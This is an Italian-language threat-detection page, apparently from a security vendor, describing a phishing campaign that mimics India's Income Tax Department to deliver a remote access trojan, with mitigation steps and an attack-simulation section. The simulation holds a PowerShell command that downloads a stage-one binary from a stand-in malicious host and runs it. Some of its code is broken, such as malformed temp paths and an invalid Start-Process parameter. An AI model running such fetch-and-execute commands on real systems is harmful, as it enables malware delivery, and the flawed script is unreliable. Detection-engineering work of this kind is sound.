Campagna di Phishing Mima l’Imposta sul Reddito dell’India per Colpire le Aziende
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Un’operazione di phishing che imita il Dipartimento delle Imposte sul Reddito indiano consegna un PDF trappola che conduce i destinatari a un portale di conformità contraffatto. Il sito invita le vittime a scaricare un pacchetto ZIP contenente un installer NSIS firmato, che poi distribuisce un Trojan di Accesso Remoto multi-fase. Il RAT persiste creando un servizio Windows e comunica con più server C2 su porte non standard.
Indagine
I ricercatori hanno analizzato l’esca del PDF, l’URL incorporato e il flusso di lavoro concatenato dell’installer NSIS. Hanno documentato i binari rilasciati su disco, la creazione di una cartella di installazione nascosta e la registrazione di NSecRTS.exe come un servizio di Windows. Il report ha anche catturato le comunicazioni in uscita verso tre indirizzi IP e ha evidenziato l’uso di payload firmati lungo tutta la catena di distribuzione.
Mitigazione
Blocca il dominio malevolo e gli indirizzi IP correlati al perimetro e tramite controlli proxy. Rafforza le protezioni email per identificare allegati e link a tema fiscale che portano a portali di conformità simili. Previeni l’esecuzione automatica di installer non affidabili, se possibile, e monitora la creazione di servizi sospetti, specialmente qualsiasi cosa chiamata “Windows Real-time Protection Service.”
Risposta
Genera avvisi sui nomi di file elencati, gli hash e l’attività di registrazione del servizio Windows legati alla catena di infezione. Isola gli endpoint compromessi, acquisisci immagini di memoria e disco ed esegui una scansione forense completa per identificare eventuali ulteriori stadi RAT o strumenti. Rimuovi gli artefatti di persistenza e reimposta le credenziali potenzialmente esposte per prevenire nuove intrusioni.
Flusso di attacco
Rilevamenti
Comando e Controllo Sospetto da Richiesta DNS con Dominio di Livello Superiore (TLD) Insolito (via dns)
Visualizza
IOC (DestinationIP) per rilevare: Campagna di Phishing a Tema Fiscale Indiano Mire le Aziende Locali
Visualizza
IOC (SourceIP) per rilevare: Campagna di Phishing a Tema Fiscale Indiano Mire le Aziende Locali
Visualizza
IOC (HashMd5) per rilevare: Campagna di Phishing a Tema Fiscale Indiano Mire le Aziende Locali
Visualizza
Rilevamento dell’Esecuzione di Malware nella Campagna di Phishing a Tema Fiscale Indiano [Creazione Processo Windows]
Visualizza
Rilevamento della Comunicazione C2 di NSecRTS.exe [Connessione di Rete Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-Flight di Telemetria & Baseline deve essere passato.
Motivazione: Questa sezione dettagliatamente l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrativa dell’Attacco & Comandi:
Un avversario consegna un’email di phishing intitolata “Avviso Fiscale”. L’allegato è un documento Word malevolo che rilasciasetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. La vittima esegue il file, che a sua volta generaSibuia.exe(il vero payload) come suo figlio. Questa catena padre‑figlio è progettata per bypassare gli avvisi di creazione di processi generici ma viene catturata dalla regola Sigma.Passaggi eseguiti sull’host compromesso:
- Rilascia il binario di primo stadio:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Esegui il binario di primo stadio:
Start-Process -FilePath $stage1 -NoNewWindow - Il binario di primo stadio crea internamente il binario di secondo stadio
Sibuia.exenella stessa directory e lo avvia: (Simulato dallo script di test qui sotto.)
- Rilascia il binario di primo stadio:
-
Script di Test sui Regressi:
Lo script qui sotto riproduce la esatta relazione genitore‑figlio richiesta per attivare la regola.# ------------------------------------------------- # Simulazione di catena di phishing Fiscale-Indiano # ------------------------------------------------- # Define paths $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Create dummy binaries (zero‑byte – sufficient for Sysmon logging) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Ensure files are executable (Windows does not need chmod) Write-Host "[*] Launching stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Give stage1 a moment to “spawn” stage2 (simulated by direct launch) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 spawning stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulation complete. Verify detection in SIEM." # ------------------------------------------------- -
Comandi di Pulizia:
Rimuovi gli artefatti e termina eventuali processi residui.# Stop any leftover processes Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Delete files Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Cleanup complete."